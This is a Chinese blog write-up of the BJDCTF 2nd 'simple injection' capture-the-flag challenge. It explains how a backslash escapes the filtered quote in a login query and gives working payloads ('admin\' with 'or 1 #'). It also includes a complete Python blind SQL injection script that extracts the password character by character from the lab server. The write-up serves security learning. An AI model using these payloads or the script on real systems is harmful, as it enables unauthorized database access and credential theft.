[BJDCTF 2nd]简单注入(过滤了引号,利用\逃逸sql语句第二字段)

最新推荐文章于 2023-09-26 23:20:49 发布
最新推荐文章于 2023-09-26 23:20:49 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: CTF-Web 文章标签: mysql 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/105810265
版权

进入后页面:在这里插入图片描述
看看后台用什么闭合的,测试单引号:在这里插入图片描述
在这里插入图片描述
发现直接就给你过滤了。试试还过滤了什么,发现过滤了以下指令:
在这里插入图片描述
(这个方法挺巧的)

union , select , = , ' , & , && , - ,  " , and

连引号都过滤了,这可怎么做啊。
看看又什么提示,源码里面啥也没有,扫描一下发现robots.txt:在这里插入图片描述
发现了hint.txt提示,访问看看:
在这里插入图片描述
显示了后端的SQL语句,我们可以使用 \ 转义符转义username后面的引号,令username的第一个引号和password的第一个引号闭合,逃逸出password第一个引号后面的内容
解释:
由于过滤了引号,我们不能闭合引号了,所以我们不能用以下方法登录:

用户名:admin' or 1=1#
密码:123

所以我们要使用 \ 转义符转义username后面的引号,令username的第一个引号和password的第一个引号闭合,逃逸出password第一个引号后面的内容,即:

用户名:admin\
密码:or 1 #     //等号也被过滤了

即构造了:select * from users where username='admin\' and password='or 1 #'

在这里插入图片描述

出现了:BJD needs to be stronger。也就是说查询正确的结果和查询错误的结果显示的页面是不一样的,那不就是盲注吗,由此编写二分盲注脚本(其实就是在原来的二分盲注脚本基础上改改就行)

根据hint:Only u input the correct password then u can get the flag
应该是说只要密码对就行,用户名应该不在检测范围内,当然这只是猜测,所以我们脚本里用的用户名为admin,后续证明就是这样的。

手动测试的时候or也没有被过滤,脚本里面就出错了,将or换成了^异或符号:

import requests
import time

url = "http://d5c62637-a5bd-4695-a11f-97b5cecb2838.node3.buuoj.cn/index.php"
temp = {}
password = ""
for i in range(1,1000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        payload = '^ (ascii(substr((password),%d,1))>%d)#' % (i,mid)      
        # select * from users where username='admin\' and password='^ (ascii(substr((password),%d,1))>%d)#'
        temp={"username":"admin\\","password": payload}
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        if "P3rh4ps" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    password +=chr(mid)
    print(password)


print("password=",password)

运行之后拿到密码:
在这里插入图片描述
使用admin / OhyOuFOuNdit登录即可获取flag
在这里插入图片描述

zhang三
关注
专栏目录
[BJDCTF 2nd]简单注入 -wp
freerats的博客
07-17 554
拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 有一条后台查询语句 回到登入框处,尝试注入,发现加单双引号都被过滤 fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用不了,报错注入无回显也不行。考虑盲注。 当username=admin&a.
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1629
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
Sql注入(手工注入思路、绕过、防御)
最新发布
Naive的博客
09-26 2895
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
[BJDCTF 2nd]简单注入
m0_53314778的博客
02-09 197
[BJDCTF 2nd]简单注入 考点:盲注 启动:拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。访问hint.txt 有一条后台查询语句:select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 应该有注入点 回到登入框处,尝试注入,发现加单双引号都被过滤fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
[BJDCTF 2nd]简单注入【Bool+Regexp注入
D.MIND 的博客
04-28 471
这道题跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写 文章目录Regexp注入布尔盲注脚本 首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like 但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕) 本题有个hint可以通过robots.txt发现 Only u input the correct password then u can get the flag and p3rh4ps wants a girl f
[BJDCTF 2nd]简单注入 详细wp
weixin_45887311的博客
07-28 705
又开始刷SQL注入的题目,从这道简单注入下手 首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt 有后端语句比较好构造了,结果又过滤,要fuzz探测一下 发现select还有 ' "都被过滤了 幸好空格和反斜杠没有被过滤。。。。 fuzz.txt (可以自己添加) select from ascii substr table column by schema where extractvalue exp if / ( ) % ! @ # $ ^ &...
2021-07-08 CTFer成长之路-SQL注入-逃逸引号
热门推荐
时光隧道
07-08 5万+
一:逃逸引号 1.编码解码 开发者常常会用到形如urldecode、base64_decode的解码函数或者自定义的加解密函数。当用户输入addslashes函数时,数据处于编码状态,引号无法被转义,解码后如果直接进入SQL语句即可造成注入,同样的情况也发生在加密/解密、字符集转换的情况。宽字节注入就是由字符集转换而发生注入的经典案例。 宽字节注入原理:   GBK 占用两字节   ASCII占用一字节   PHP中编码为GBK,函数执行添加的是ASCII编码,MYSQL默认字符集是GBK等宽字节字符
[BJDCTF 2nd]简单注入---关于整数型注入的一些理解
StevenOnesir的博客
12-30 354
本次以BJDCTF的题目,简单对整数型注入做一些讲解。 首先进入界面: 看到的是比较友善的登录界面,考虑题目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。 因此开始考虑整数型注入。 既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。 在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。 我们构建第一个payload: username=a password=1 or length(da
mysql 过滤单引号 注入_被过滤引号的SQL注入如何破?
weixin_39940182的博客
01-19 2527
在去年十月份的时候本菜参加了一场CTF比赛,有一道过滤单引号的SQL注入当时并没有做出来,让我一直心心念念。今天在做CISCN2019 总决赛 EasyWeb题的时候受到了启发,终于解开了一个心头的包袱。先祭出当时比赛的原题,高手请一笑而过。。...
SQL注入过滤单引号是否无解
u012064609的专栏
12-18 2万+
sql注入攻击能够得逞,往往是因为前台页面传递的参数含有非法字符,导致sql原有逻辑发生改变。如经典的登录验证例子 程序处理:select * from tableXX where username
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值